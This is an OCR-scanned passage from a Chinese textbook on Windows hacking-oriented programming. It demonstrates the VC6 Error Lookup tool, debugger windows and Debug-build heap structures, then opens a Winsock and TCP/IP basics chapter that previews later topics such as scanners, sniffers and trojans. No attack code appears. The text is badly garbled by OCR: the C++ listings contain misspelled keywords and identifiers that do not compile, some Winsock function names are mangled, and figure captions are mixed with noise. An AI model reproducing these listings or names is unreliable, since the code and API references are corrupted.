同样 ， 将 错误 代码 “2” 输 入 该 工具 的 编辑 框 中 ， 可 以 看 到 给 出 的 提示 也 是 “系统 找 不 到 
指定 的 文件 ?。 该 错误 码 的 类 型 为 “Win32” 类 型 ， 此 类 型 属于 Win32 API 定义 的 错误 代码 。 
除了 Win32 的 错误 码 外 ， 这 里 将 编写 另外 一 个 程序 例子 来 测试 该 软件 。 代 码 如 下 : 


#include <stdio.h> 





Fe Error Lookup 














图 1-17 “ErrorLookup” 工 具 











int main() 
int *p'= NULL:; 
i 


区 SEE DO 
} 


该 代码 在 YC6 下 编辑 完成 后 按 F5 调试 运行 ， 当 程序 执行 到 *p = 3 时 ， 程 序 会 报错 ， 如 
图 1-18 所 示 。 
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图 1-18 错误 代码 为 0xC0000005 


调试 提示 的 错误 码 为 0xC0000005， 将 该 错误 码 复制 到 Windows Error Lookup Tool 中 查 
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图 1-19 ”错误 类 型 为 STATUS _ ACCESS_VIOLATION 


在 图 1-19 中 ， 错 误 的 定义 为 STATUS ACCESS _VIOLATION， 意 思 是 访问 违例 。 在 例子 
代码 中 对 0 地 址 进行 了 赋值 ， 而 0 地 址 是 禁止 访问 的 地 址 ， 因 此 提示 为 访问 内 存 违 例 。 目 前 
Windows Error Lookup Tool3.0.6 版 本 没有 对 0xC0000005 的 错误 码 给 出 正确 的 描述 , 但 是 对 其 
他 绝 大 部 分 错误 码 都 能 给 出 正确 的 错误 描述 。( 提 示 对 于 指针 的 赋值 , 一 定 要 检查 指针 的 有 效 
性 。 在 指针 进行 定义 和 指针 指向 空间 释放 时 ， 一 定 要 将 其 赋值 为 NULL。 这 样 ， 当 程序 出 错 
时 ， 可 以 较 容 易 地 找到 代码 的 错误 位 置 。) 


1.5.3 VC6 调试 工具 介绍 


在 编写 代码 的 过 程 中 ， 经 常 需 要 查找 逻辑 上 的 问题 ， 或 者 是 查找 一 些 原因 不 明 的 问题 。 
在 这 种 情况 下 ， 就 需要 使 用 调试 工具 对 编写 的 代码 进行 调试 ， 以 便 能 够 找到 代码 中 的 问题 。 

1. 调试 器 

调试 的 一 般 过 程 是 让 程序 在 调试 的 状态 下 和 运行。 什么 是 调试 状态 呢 ? 其 实 很 简单 ， 就 是 
让 程序 在 调试 器 的 控制 下 运行 。 调试 器 可 以 对 程序 做 多 方面 的 控制 , 这 里 举 几 个 简单 的 方面 。 

。 调试 器 对 程序 设置 断 点 ， 使 程序 产生 中 断 从 而 停止 下 来 。 

。 调试 器 可 以 使 程序 进行 单 步 执 行 ， 即 执行 一 条 语句 (也 可 以 是 一 条 汇编 指令 ， 因 为 
高 级 语言 的 一 条 语句 可 能 会 对 应 汇编 的 多 条 指令 ) 就 停 下 来 。 

。 调试 器 可 以 让 程序 运行 到 光标 指定 的 位 置 。 

。 调试 器 在 程序 处 于 中 断 的 情况 下 可 以 查看 程序 的 各 种 执行 状态 ， 查 看 变量 的 当前 值 、 
内 存 当前 的 布局 、 当 前 的 调用 栈 情况 。 

对 于 调试 器 的 诸多 功能 ， 无 法 全 面 介绍 ， 各 种 使 用 技巧 及 方法 需要 读者 慢 慢 体会 。 下 面 
的 内 容 将 针对 上 面 的 介绍 来 说 明 VC6 中 提供 的 调试 器 的 使 用 。 

2. 被 调试 程序 的 代码 

调试 器 具有 的 功能 在 前 面 已 经 进行 了 简单 的 说 明 。 前 面 介绍 调试 器 的 功能 不 单单 针对 
VC6 提供 的 调试 器 ， 几 乎 任何 调试 器 都 支持 以 上 功能 ， 而 且 专 业 的 调试 器 功能 远 不 止 如 此 。 
下 面 举例 介绍 说 明 VC6 的 调试 器 。 

首先 新 建 一 个 VC6 的 控制 台 应 用 程序 ， 输 入 如 下 代码 : 


#include <iostream.h> 


int main(int argc, char* argv[]) 





中 
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// 定义 3 个 整 型 的 指针 变量 


int xp = NULL? /1 32 位 的 整 型 变量 指针 
_int64 *q = NULL; /7 64 位 的 整 型 变量 指针 
int xm = NULL; // 32 位 的 整 型 变量 指针 


// 使 用 new 分 配 一 个 整 型 的 内 存 空 间 
// 用 指针 变量 p 指向 该 内 存 空间 
p= new int; 
if ( p == NULEL ) 
{ 

retorn = 
} 


/7 为 指针 变量 p 指向 的 内 存 空间 赋值 
*p = 0xl12233447 


// q 和 m 操作 同 p 
9 = New int64; 
if (9 == NOIE ) 
{ 

returrn |—1» 


} 
*g = 0x1122334455667788; 


m= new int; 
if ( m == NULL ) 
{ 

天 全 七 ED | = 


*m = OX11223344; 


// 释放 3 个 变量 指向 的 地 址 空间 
/7 释放 顺序 依次 是 q、m、p 
delete q; 

qq = NULL; 


delete my; 
m= NULL; 


delete p; 
B= NULL; 


return 0; 


} 

写 完 该 程序 后 ， 按 F7 键 进行 编译 连接 ， 生 成 可 执行 文件 。 上 面 的 步骤 属于 代码 编辑 、 编 译 、 
连接 的 过 程 。 接 下 来 要 完成 的 工作 是 对 这 段 源 代码 生成 的 可 执行 文件 进行 调试 ， 目 的 是 熟悉 VC6 
的 调试 器 ,以 及 熟悉 VC6 下 Debug 编译 方式 下 生成 的 可 执行 文件 是 如 何 对 “ 扒 ” 空 间 进行 管理 的 。 


DD 注 : 扒 空间 是 在 程序 运行 时 由 程序 员 自 己 申请 的 空间 ， 该 空间 同样 需要 程序 员 自己 进行 释放 。 在 C++ 语言 

中 , 使 用 new 关键 字 申 请 堆 空间 , 使 用 delete 关键 字 可 以 对 堆 空间 进行 释放 。 C 语言 中 的 malloc() 和 free() 
函数 也 是 申请 和 释放 堆 空间 的 函数 。 在 程序 中 ， 除 了 有 “ 堆 ” 空 间 以 外 ， 还 有 另 一 种 称 为 “ 栈 ” 的 内 存 空 
间 ， 栈 空间 是 由 系统 进行 维护 的 空间 。 局 部 变量 和 函数 的 参数 使 用 的 都 是 栈 空 间 ， 栈 空间 的 分 配 和 回收 是 
由 系统 自动 进行 维护 的 。 这 里 的 “ 挫 ” 与 数据 结构 中 的 “ 推 排序 ”没有 任何 关系 。 


3. 认识 调试 窗口 
在 编辑 完 以 上 的 代码 后 ， 按 F10 键 让 程序 处 于 调试 状态 ， 开 始 对 编译 生成 的 程序 进行 调 


My 
~ 
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程序 的 窗口 界面 如 图 1-20 所 示 。 
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图 1-20 VC 的 调试 界面 


VC 的 调试 界面 分 为 5 个 区 域 ,，( 从 左 到 右 、 从 上 到 下 ) 依次 是 调试 工作 区 、 寄 存 器 
窗口 、 调 用 栈 窗口 、 监 视窗 口 和 内 存 窗口 。 除 了 调试 工作 区 外 ， 其 余 几 个 窗口 都 不 是 必 
需 的 。 根 据 环境 的 不 同 ， 不 是 每 个 VC6 在 调试 状态 下 都 会 出 现 这 些 窗口 。 除 了 这 几 个 窗 
口外 ， 还 有 其 他 关于 调试 方面 的 窗口 。 各 种 调试 窗口 的 打开 方式 可 以 通过 菜单 进行 ， 如 
图 1-21 所 示 。 





监视 窗口 

调用 栈 窗口 
: 2 Memory Al+6 - 内 存 窗 口 
/7 使 用 new 分 配 一 个 pr Registers ” 寄存 器 窗口 
Z/ 用 指针 亚 量 p 指 向 该 内 让 吕 6ssetnbly at E 反 汇 编 窗 口 








1-21 打开 调试 窗口 的 菜单 


VC6 的 调试 环境 提供 了 6 个 调试 窗口 , 均 是 常用 的 调试 窗口 。 调 试 窗口 的 使 用 非常 容易 ， 
这 里 不 做 过 多 的 介绍 。 

程序 在 进入 调试 状态 后 ， 不 可 能 始终 通过 单 步 方式 让 程序 一 步 一 步 执行 。 调 试 器 提供 了 
多 种 调试 运行 方式 ， 通过 调试 器 控制 可 以 使 程序 按照 不 同 的 方式 运行 。VC6 提供 了 几 种 调试 
运行 的 方式 ， 如 图 1-22 所 示 。 
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图 1-22 中 的 4 种 运行 方式 分 别 如 下 。 

Step Into: 这 种 方式 称 为 单 步 步 入 方式 ， 快 捷 键 是 Fll 键 。 单 
步 步 入 的 意思 是 当 单 步调 试 时 ， 遇 到 函数 调用 时 会 进入 被 调用 的 
函数 体内 。 

Step Over: 这 种 方式 称 为 单 步 步 过 方式 ， 快 捷 键 是 F10 键 。 
单 步 步 过 的 意思 是 当 单 步调 试 时 ， 遇 到 函数 调用 时 不 会 进入 被 调 
用 的 函数 体内 。 

Step Out: 这 种 方式 称 为 执行 到 函数 返回 处 。 当 调试 进入 某 
个 函数 时 ， 这 个 函数 又 不 是 调试 的 关键 函数 ， 可 以 通过 该 方式 快 
速 返回 。 

Run to Cursor: 这 种 方式 称 为 执行 到 光标 处 。 当 调试 时 明确 
知道 要 调试 的 地 方 时 ， 可 以 使 程序 运行 至 光标 指定 的 位 置 ， 这 样 图 1-22 调试 菜单 
会 节省 很 多 因为 单 步调 试 而 浪费 的 时 间 。 

除了 上 面 几 个 调试 命令 外 ， 再 介绍 3 个 调试 的 命令 , 分 别 是 F9、F5 和 F7 键 。F9 键 是 在 
光标 指定 的 位 置 设置 断 点 ， 当 程序 在 调试 状态 下 运行 时 遇 到 断 点 ， 会 产生 中 断 〈 程 序 在 调试 
器 中 被 中 断后 可 以 观察 被 调试 程序 的 变量 值 ， 某 块 内 存 中 的 内 容 ); F5 键 使 程序 进入 调试 状 
态 运 行 ， 如 果 代 码 中 有 上 断 点 ， 则 会 在 断 点 处 产生 中 断 ， 如 果 没 有 断 点 ， 程 序 会 运行 到 界面 启 
动 或 等 待 用 户 的 交互 , 或 者 直接 执行 完 程序 自动 结束 调试 状态 ; F7 键 是 结束 调试 状态 下 运行 
的 程序 。 

在 调试 程序 时 ， 尤 其 是 调试 代码 量 非常 大 的 程序 时 ， 往 往 不 可 能 通过 单 步 执行 一 直 来 进 
行 调试 。 通 常情 况 是 在 某 个 或 某 几 个 关键 的 位 置 设置 断 点 ， 然 后 让 程序 处 于 调试 运行 ， 当 运 
行 到 断 点 处 ， 程 序 会 产生 中 断 ， 这 时 再 通过 单 步调 试 方法 调试 重要 的 代码 部 分 ， 观 察 变 量 、 
内 存 、 调 用 栈 等 数据 的 实时 变化 情况 。 一 般 调试 时 ， 都 是 调试 部 分 代码 的 上 下 文 ， 很 少 有 从 
头 开始 调试 的 ， 那 样 效率 就 太 低 下 了 。 

4. 调试 程序 

前 面 的 准备 工作 都 已 经 完成 了 ， 接 下 来 就 来 调试 上 面 编 辑 的 代码 。 按 F10 键 ， 让 程序 处 
于 调试 状态 ， 在 监视 窗口 (AlttF3 组 合 键 显示 的 Watch 窗口 ) 添加 要 监视 的 变量 ， 分 别 是 p、 
q、m、&p、&q、&m。 当 前 调试 的 光标 在 main() 函 数 的 第 一 个 花 括 号 处 ， 按 F10 键 单 步 执行 
一 步 观察 监视 窗口 ， 如 图 1-23 所 示 。 

观察 如 图 1-23 所 示 的 Watch 窗口 ， 通 过 &p、&q 和 &m 可 以 看 出 ，3 个 指针 变量 p、g 和 
m 已 经 分 配 了 变量 的 空间 ， 分 别 是 0x0012ff7c、0x0012ff78、0x0012ff74〈 如 果 没 有 Watch 窗 
口 ， 可 以 按照 前 面 的 介绍 打开 Watch 窗口 ， 如 果 在 Watch 窗口 中 没有 内 容 ， 可 以 在 Watch 窗 
口中 进行 添加 )。 从 这 里 可 以 看 出 , 在 主 函 数 中 先 定义 的 变量 的 地 址 〈 局 部 变量 使 用 的 是 栈 地 
址 ) 要 大 于 后 定义 的 变量 的 地 址 。 由 于 在 Win32 系统 下 指针 变量 所 占用 的 空间 大 小 为 4 字 节 ， 
通过 3 个 地 址 值 可 以 看 出 ，3 个 变量 的 地 址 按照 定义 顺序 依次 紧 挨 。 变 量 p、g 和 m 的 值 为 
0xcccccccc， 这 是 VC6 Debug 编译 方式 下 默认 对 局 部 变量 初始 化 的 值 。 

单 步 执 行 到 p= new int; 代 码 处 ， 观 察 监视 窗口 ， 这 时 可 以 看 到 3 个 变量 的 值 为 0， 因为 
3 个 变量 经 过 初始 化 后 值 都 被 赋 为 NULL。 
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tinclude <iostrean.h> 


int nain(int argc, chars arguf]) 


贡 一 疏 





pe 63 sd 
int wm w NULL; 
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ZX 使 的 内 空间 未 二 局 示 一 
0/ 焦 时 2 二 寺 全 束 开 的 外 高 宝 间 。 调试 光标 执行 的 位 置 表示 待 执行 的 代码 
记 new 和 

证 《Fw NULL ) 


‘ 
号 


/7 为 指针 训 量 p 沸 向 的 内 存 空 间 赋值 变量 的 值 ， 上 面 三 个 表示 变量 的 值 
op ”了 1122334h; 下 面 三 个 表示 上 面 三 个 变量 的 地 址 


return -1 
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J[c> dct TTT Char wn CE e | 
mainCRiStartup() line 206 + 25 bytes VI xcccccccc 
KERBRNEL324 7c817977() 二 人 





监视 的 变量 和 表达 式 ， 上 面 三 个 是 变 
量 ， 下 面 三 个 是 上 面 三 个 变量 的 指针 


图 1-23 Watch 窗口 的 说 明 


在 if(p 二 NULL ) 代 码 处 按 F10 键 ， 观 察 p 指向 地 址 的 值 ， 如 图 1-24 所 示 。 在 VC6 的 
Debug 编译 方式 下 ， 未 进行 赋值 的 堆 空间 的 值 为 0xXCDCDCDCD。 
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图 1-24 未 赋值 的 堆 空 间 的 值 为 0xXCDCDCDCD 
按 F10 键 单 步 到 g =new __int64; 代 码 处 ， 观 察 监视 窗口 和 内 存 窗口 (内 存 窗口 调 整 为 每 


行 显示 16 字 节 )， 如 图 1-25 所 示 。 
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图 1-25 通过 监视 窗口 的 地 址 观察 内 存 窗 口 








1.5 VC 相关 开发 辅助 工具 





在 监视 窗口 中 ， 将 &p、&q 和 &m 进行 修改 ， 修 改 为 (int *)&p、(_ int *)&q 和 (int *)&m。 
这 里 简单 说 明 一 下 ， 指 针 变 量 p 的 地 址 为 0x0012ff7c，P 指向 的 地 址 为 0x00382e50，p 指向 
的 地 址 中 的 值 为 0x11223344。 观 察 内 存 窗口 ， 在 0x00382e50 处 保存 的 值 为 44 33 22 11 〈 相 
当 于 0x11223344。 关 于 为 什么 顺序 是 反 的 ， 在 后 面 的 章节 中 会 给 出 解释 )。 


注 : 有 些 C 语言 的 书 中 说 道 ， 指 针 就 是 地 址 。 这 样 的 说 法 是 不 严密 的 ， 准 确 来 说 ， 指 针 是 有 类 型 的 地 址 。 
“*” 操 作 需 要 根据 指针 的 类 型 来 进行 取 值 。 对 于 一 个 指针 ， 要 了 解 其 4 个 方面 ， 分 别 是 指针 的 类 型 、 指 针 
的 地 址 、 指 针 指 向 的 地 址 和 指针 指向 地 址 的 值 。 如 果 对 这 里 的 解释 不 明白 ， 请 复习 C 语言 关于 介绍 指针 的 
部 分 ， 这 里 不 对 C 语言 的 语法 知识 进行 过 多 的 介绍 。 


按 F10 键 单 步 执行 到 delete q; 代 码 处 , 将 p 指向 的 地 址 减 0x20 字 节 , 即 0x00382e50 -- 0x20 = 
0x00382e30， 然 后 在 内 存 窗口 中 观察 ， 如 图 1-26 所 示 。 
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===m 








图 1-26” 内 存 窗口 


现在 来 分 析 图 1-26 中 的 内 容 , 通过 监视 窗口 可 以 看 出 p 指向 的 空间 为 0x00382e50, g 指 
向 的 空间 为 0x00382e98，m 指向 的 空间 为 0x00382ee0。 这 3 个 变量 指向 的 空间 比较 近 。 再 来 
观察 内 存 窗口 ， 0x00382e30 地 址 处 的 值 为 “98 07 38 00 78 2e 38 00”， 这 里 是 两 个 地 址 ， 分 
别 是 0x00380798 和 0x00382e78; 0x00382e78 地 址 处 的 值 为 “30 2e 38 00 c0 2e 38 00”， 这 里 
也 是 两 个 地 址 ， 分 别 是 0x00382e30 和 0x00382ec0。0x00382e30 是 不 是 看 着 比较 眼熟 ?这 个 
值 就 是 内 存 窗口 中 第 一 个 地 址 的 位 置 。0x00382ec0 地 址 处 的 值 为 “78 2e 38 00 00 00 00 00”， 
这 里 同样 是 两 个 地 址 , 分 别 是 0x00382e78 和 0x00000000。0x00382e78 是 不 是 看 着 比较 眼熟 ? 整 
理 一 下 这 几 个 地 址 ， 如 图 1-27 所 示 。 从 图 1-27 中 可 以 看 出 ， 使 用 new 申请 的 堆 空间 是 通过 双 问 
链表 进行 链 式 管理 的 。 图 1-27 所 示 为 最 后 一 个 节点 的 0x00000000 表示 链表 的 结尾 。 





0x00382e30 -一 w| 0x00380798 
0x00382e78 | 
0x00382e78 一 要 ~ 一 一 一 
| | 0x00382ec0 | 


: | 
0x00382ec0 上 |- 一 ~| 0x00382e78 上 -一 ! 
0x00000000 


图 1-27 堆 的 链 式 管理 
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明白 了 链表 是 链 式 管理 后 ， 接 着 我 们 分 析 其 他 相关 数据 。 当 使 用 new 申请 的 空间 不 再 使 
用 时 ， 会 使 用 delete 释放 空间 ， 那 么 delete 要 释放 多 大 的 空间 呢 ? 堆 空间 的 首 地 址 处 是 管理 
双向 链表 的 指针 , 在 首 地 址 偏 移 0x10 的 位 置 记录 了 堆 空 间 的 大 小 , 第 一 个 堆 空 间 的 首 地 址 是 
0x00382e30， 偏 移 0x10 的 位 置 是 0x00382e40， 在 0x00382e40 地 址 保存 的 值 为 4。 其 余 几 个 
用 new 申请 的 空间 的 大 小 通过 这 种 方式 也 可 以 找到 。 

在 堆 空 间 偏 移 0x18 的 位 置 记录 堆 的 一 个 序号 ， 程 序 中 通过 new 申请 的 第 1 块 堆 空间 的 
序号 为 30， 第 2 块 为 31， 第 3 块 为 32。 

在 图 1-26 中 ， 每 个 数值 的 前 后 (对 六 9 和 m 赋 的 值 ) 都 有 4 个 “FD FD FD FD 44 33 22 
11 FD FD FD FD”， 前 后 的 FD 是 用 来 在 调试 时 检测 溢出 的 。 当 为 指向 整 型 地 址 的 疡 变量 赋值 
超过 4 字 节 时 ， 就 会 覆盖 数值 后 面 的 ED， 当 调试 程序 时 ， 通 过 查看 FD 的 值 ， 就 可 以 观察 到 
赋值 洲 出 了 。 

关于 堆 的 管理 结构 就 介绍 这 么 多 ， 继 续 按 F10 键 单 步 执 行 ， 执 行 到 gq = NULL 语句 处 ， 
观察 内 存 窗口 ， 如 图 1-28 所 示 。 
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图 1-28 释放 g 指向 的 内 存 后 的 内 存 布 局 


通过 图 1-28 可 以 看 出 , 释放 后 的 堆 空 间 会 被 赋值 为 “EE FE” 观察 堆 链表 的 指针 的 变化 ， 
第 1 块 堆 的 后 继 链 表 指 针 指 向 了 第 3 块 堆 ， 第 3 块 堆 的 前 驱 链表 指针 指向 了 第 1 块 堆 。 关 于 
链表 的 具体 操作 ， 需 要 学 习 和 阅读 关于 数据 结构 的 知识 。 


提示 : VC 默认 提供 2 种 编译 方式 ， 分 别 为 DEBUG 和 RELEASE。 以 上 堆 管 理 方法 为 DEBUG 编译 方式 ， 
RELEASE 编译 方式 并 不 是 该 种 管理 方法 。 


1.6 总 结 


作为 黑客 编程 的 基础 ， 本 章 介 绍 了 关于 Windows 消息 的 知识 。Windows 中 存在 各 种 
各 样 的 消息 ， 学 习 和 掌握 Windows 的 消息 可 以 更 好 地 掌握 Windows 的 编程 。 无 论 是 应 用 
程序 编程 还 是 黑客 编程 ， 这 里 都 是 以 Windows 为 平台 在 进行 开发 ， 那 么 其 中 的 基础 必然 
相同 。 














1 总 结 





在 编写 程序 时 ， 需 要 各 种 各 样 的 辅助 工具 来 协助 代码 的 编写 。 当 编写 的 程序 出 现 问题 时 ， 需 
要 对 程序 进行 调试 。 关 于 开发 的 辅助 工具 ， 本 章 介绍 了 Spy++、Error Lookup。 对 于 调试 工具 ， 
通过 调试 堆 的 管理 方法 介绍 YC6 的 集成 调试 工具 。 对 于 前 面 的 部 分 ， 读 者 需要 进行 深刻 的 理解 ， 
对 于 本 章 后 面 的 部 分 需要 实际 动手 实验 。 本 章 作 为 全 书 的 基础 ， 在 后 续 的 各 章 中 会 用 到 本 章 的 
知识 。 

本 章 的 知识 中 ， 至 少 掌握 消息 、 消 息 通信 的 相关 知识 ， 至 于 VC6 下 Debug 方式 对 “ 堆 ” 
内 存 空 间 的 管理 并 不 是 必须 要 掌握 ， 重 点 是 掌握 VC6 提供 的 调试 器 的 使 用 方法 。 
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一 网 络 攻 防 是 一 个 比较 大 的 话题 ， 本 书 只 介绍 常见 的 攻防 技术 ， 比 如 端口 扫描 、SQL 
Injection 扫描 、 数 据 包 嗅 探 、 网 络 密码 猜 解 、 后 门 、 木 马 等 知识 的 基础 技术 。 这 些 技术 在 
入 侵 剖 析 中 是 比较 常见 的 技术 ,本 书 通过 常见 的 技术 介绍 网 络 攻 防 方面 的 编程 知识 。 由 于 
SQL Injection 扫描 、 后 门 等 软件 在 入 侵 中 被 大 量 使 用 ， 也 就 是 说 ， 读 者 已 经 有 了 一 定 的 感 
性 认识 , 这 样 有 助 于 读者 理解 常见 入 侵 技术 的 原理 , 在 感性 认识 的 基础 上 学 习 技 术 原 理 就 
会 有 一 个 质 的 升华 , 上升 到 理性 的 认识 , 这样 对 于 学 习 网 络 编程 来 说 就 是 一 个 比较 轻松 的 
过 程 了 。 

在 学 习 扫描 器 、 嗅 探 回 、 木 马 等 知识 之 前 ， 首 先 必 须 学 习 网 络 编程 的 基础 知识 ， 连 网 络 
编程 的 基础 都 没有 的 话 ， 扫 描 、 嗅 探 的 知识 就 更 谈 不 上 了 。 本 章 重 点 讲述 Windows 下 网 络 编 
程 的 基础 知识 。 

学 习 网 络 ， 无 论 是 网 络 的 应 用 ， 还 是 网 络 编程 ， 本 质 都 是 网 络 的 各 种 协议 。 编 写 网 络 黑 
客 工 具 更 是 离 不 开 网 络 的 各 种 协议 。 本 章 重 点 介绍 的 是 关于 Windows 下 关于 网 络 编程 的 知 
识 ， 对 于 所 涉及 到 的 网 络 相 关 的 知识 会 进行 简单 的 描述 。 关 于 更 深入 的 网 络 协议 的 知识 ， 读 
者 可 以 专门 阅读 关于 网 络 协议 方面 的 书籍 。 


2.1 Winsock 编程 基础 





网 络 编程 的 基础 是 今后 深入 学 习 网 络 的 起 步 ， 没 有 基础 知识 ， 扫 描 、 嗅 探 都 是 空谈 。 
2.1.1 网 络 基础 知识 


各 计算 机 之 间 通 过 互联 网 进行 通信 主要 依赖 TCP/IP。 该 协议 是 一 个 4 层 协 议 ， 由 上 至 下 
分 别 是 应 用 层 、 传 输 层 、 网 际 层 和 链 路 层 。TCP/IP 的 下 层 协 议 总 是 为 上 层 协 议 服务 ， 下 层 协 
议 的 细节 对 于 上 层 协议 来 说 是 透明 的 。 分 层 设计 的 好 处 是 ， 每 一 层 的 功能 比较 明确 ， 而 且 修 
改 某 一 层 的 实现 不 会 影响 其 他 层 。TCP/IP 在 每 层 协 议 中 都 定义 了 非常 多 的 不 同 的 协议 ， 比 如 
网 际 层 的 协议 ICMP、IGMP 等 ， 传 输 层 的 TCP、UDP 等 。 在 众多 协议 中 ， 最 具 代 表 性 的 协 
议 是 TCP 和 IP， 因 此 ， 互 联网 协议 被 称 为 TCP/IP 族 ( 千 万 别 认为 TCP 和 卫 就 是 互联 网 协 
议 的 全 部 )。 
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2.1 Winsock 编程 基础 知识 





-Dp 注 : 有 的 书 认为 TCP/IP 是 5 层 协 议 , 有 的 书 认为 TCP/IP 是 4 层 协议 。 如 果 认为 TCPIP 协议 是 5 层 协议 ， 
那么 在 链 路 层 的 下 层 会 有 一 个 物理 层 ， 而 4 层 协议 中 将 物理 层 归 入 了 链 路 层 。 至 于 到 底 是 4 层 还 是 5 层 ， 
其 实 不 必 过 于 纠结 ， 只 要 做 到 心中 有 数 即 可 。 

IP 协议 是 “Internet Protocol” 的 简称 ， 它 是 为 计算 机 网 络 相 互 连 接 进 行 通信 而 设计 的 协 
议 。 在 IP 协议 中 最 重要 的 就 是 I 了 PP 地址 , IP 地 址 是 用 来 在 网 络 上 唯一 标识 计算 机 主机 的 地 址 。 
互联 网 中 没有 两 个 机 器 有 相同 的 IP 地 址 ， 因 此 它 是 用 来 标识 一 台 网 络 主机 的 。 所 有 的 卫 地 
址 都 是 32 位 长 ， 它 用 点 分 十 进 制 法 来 表示 ， 比 如 “10.10.30.12”。 了 P 地 址 指定 的 不 是 主机 ， 
而 是 网 络 接口 设备 。 因 此 , 一 台 主 机 有 两 个 网 络 接口 ,那么 就 会 有 两 个 卫 地 址 。 通 常情 况 下 ， 
对 于 一 台 普 通 主 机 只 有 一 个 网 络 接 口 设备 ， 也 就 只 有 一 个 卫 地 址 ， 比 如 个 人 使 用 的 PC 通常 
只 有 一 个 中 地 址 ;而 对 于 服务 器 或 者 网 络 设备 〈 交 换 机 、 路 由 器 等 ) 来 说 ， 则 会 有 多 个 网 络 
接口 设备 , 每 个 网 络 接口 设备 都 会 有 一 个 卫 地 址 ,那么 对 于 路 由 器 这 种 网 络 设备 来 说 就 会 有 
多 个 耳 地 址 。 

IP 地 址 被 分 为 5 类， 分 别 是 A 类 、B 类 、C 类 、D 类 和 EE 类 。 各 类 IP 地 址 的 范围 如 
表 2-1 所 示 。 











表 2-1 各 类 IP 地 址 的 范围 
类 型 范 
A 类 0.0.0.0 一 127.255.255.255 
B 类 128.0.0.0 一 191.255.255.255 
C 类 192.0.0.0~223.255.255.255 
D 类 224.0.0.0~239.255.255.255 
E 类 240.0.0.0~247.255.255.255 














IP 工作 在 TCP/IP 4 层 协 议 的 “网 际 层 ”， 网 际 层 最 主要 的 工作 是 将 数据 包 进 行路 由 。 这 
里 所 说 IP 是 一 种 被 路 由 协议 ， 也 就 是 在 进行 路 由 的 过 程 中 ，IP 协议 会 被 路 由 协议 用 到 。 真 
正 进行 数据 包 选 路 的 协议 (其 实 就 是 路 由 的 算法 ， 数 据 包 如 何 进行 转发 的 算法 ) 被 称 为 路 由 
协议 ， 具 体 的 路 由 协议 有 RIPF、OSPF、BGP 等 。 对 于 入 门 而 言 ， 只 要 了 解 了 IP 地 址 是 什么 ， 
IP 地 址 的 作用 是 什么 即 可 。 

传输 层 主 要 有 两 大 协议 ， 分 别 是 TCP 协议 和 UDP 协议 。 

TCP 是 “Transmission Control Protocol” 的 简称 ， 其 意思 为 传输 控制 协议 。TCP 是 一 种 
面向 连接 的 、 可 靠 的 通信 协议 。TCP 协议 是 他 协议 的 上 层 协议 ，IP 服务 于 TCP。 

UDP 是 “User Datagram Protocol” 的 简称 ， 其 意思 为 用 户 数据 报 协议 。UDP 是 一 种 无 连 
接 的 传输 层 协 议 ， 提 供 面 向 事务 的 简单 不 可 靠 信 息 传 送 服务 。 

传输 层 是 为 应 用 层 提供 服务 的 ， 应 用 层 的 协议 一 部 分 是 基于 TCP 的 ， 比 如 FTP、HTTP， 
而 一 部 分 是 基于 UDP 的 ， 比 如 DNS。 了 P 层 提供 了 IP 地 址 用 来 标识 网 络 主机 ， 而 传输 层 提供 
了 端口 用 来 标识 主机 中 的 进程 。 确 定 了 PP 地址 和 端口 号 , 就 确定 了 网 络 上 的 主机 及 主机 上 通 
信 的 进程 。 

传输 层 提供 了 标识 通信 进程 的 端口 号 。 按 照 协议 划分 ， 端 口 分 为 TCP 端口 和 UDP 端口 ， 
TCP 端口 和 UDP 端口 各 有 65 536 个 。 对 于 应 用 程序 而 言 ， 一 般 使 用 大 于 1024 的 端口 号 ， 因 
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为 小 于 1024 的 端口 号 属于 保留 端口 。Internet 上 的 很 多 服务 都 是 用 了 小 于 1024 的 端口 号 为 
了 避免 冲突 , 程序 员 自己 编写 的 应 用 程序 不 要 使 用 小 于 1024 的 端口 号 。 同一 协议 的 端口 不 能 
冲突 ， 比 如 Web 服务 器 占用 了 主机 TCP 的 80 端口 ， 那 么 另外 的 程序 就 不 可 以 再 使 用 TCP 的 
80 端口 。 常 用 的 端口 号 如 表 2-2 所 示 。 


























表 2-2 常用 端口 号 举例 

Ftp 21 
Telnet 23 
Smtp 25 
DNS 53 
Tftp 69 
Http 80 
Pop3 TCP 110 


除了 小 于 1024 的 端口 号 外 , 还 有 一 些 比 较 知 名 的 端口 号 ,比如 MS SQL Server 的 端口 号 
是 1433，Windows 的 远程 桌面 端口 号 是 3389 等 。 程 序 员 在 编写 自己 的 网 络 应 用 程序 时 ， 要 
避免 与 这 些 常用 的 端口 冲突 。 


2.1.2 面向 连接 协议 与 非 面向 连接 协议 所 使 用 的 函数 


1. 面向 连接 的 协议 

在 面向 连接 的 协议 中 ， 两 台 计 算 机 之 间 在 进行 数据 收发 前 ， 必 须 先 在 两 者 之 间 建 立 一 个 
通信 信道 ， 以 确保 两 台 计 算 机 之 间 存 在 一 条 路 径 可 以 互相 沟通 。 在 数据 传输 完毕 后 ， 切 断 这 
条 通信 信道 。 该 种 方式 相当 于 打 电 话 ， 用 户 在 手机 上 拨 10086， 当 客服 人 员 接听 后 ， 用 户 就 
可 以 开始 通话 ， 通 话 完 毕 后 就 可 以 挂 电话 了 。 

面向 连接 的 协议 使 用 的 是 TCP， 服 务 器 与 客户 端 建立 通信 信道 所 需要 的 基本 Winsock 函数 
如 下 。 

服务 器 端 函数 : 

socket () =>bind()->1isten()->accept()->send() /recv()->Cclosesocket1() 


客户 端 函数 : 


socket ()->connet ()->send() /recv()->closesocket () 

2. 非 面向 连接 的 协议 

在 非 面向 连接 的 协议 中 ， 发 送 端 只 要 直接 将 要 发 送 的 数据 传 出 即 可 ， 不 需要 理会 接收 
端 是 否 能 够 收 到 数据 。 而 接收 端 在 接收 到 数据 时 ， 也 不 会 响应 信息 通知 发 送 给 发 送 端 。 该 
种 方式 就 相当 于 写 信 ， 将 写 好 的 信 放 到 信箱 中 ， 但 是 却 不 能 保证 收 信人 真 的 能 够 收 到 这 封 
信件 。 

非 面向 连接 的 协议 使 用 的 是 UDP， 服 务 器 与 客户 端 通信 所 需要 的 基本 Winsock 函数 如 下 : 

服务 器 端 函数 ， 

socket ()=>bind()=>senato () /zecvErom()->CLosesocket () 

客户 端 函数 : 


socket () =>sendto() /reéecvfrom()->closesocket () 
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面 癌 连 接 的 Winsock 函数 与 非 面 向 连接 的 Winsock 函数 会 在 后 面 的 部 分 详细 介绍 。 
2.1.3 ”Winsock 网 络 编程 知识 


Winsock 是 Windows 下 网 络 编程 的 基础 。 本 小 节 介 绍 Winsock 的 常用 函数 。 

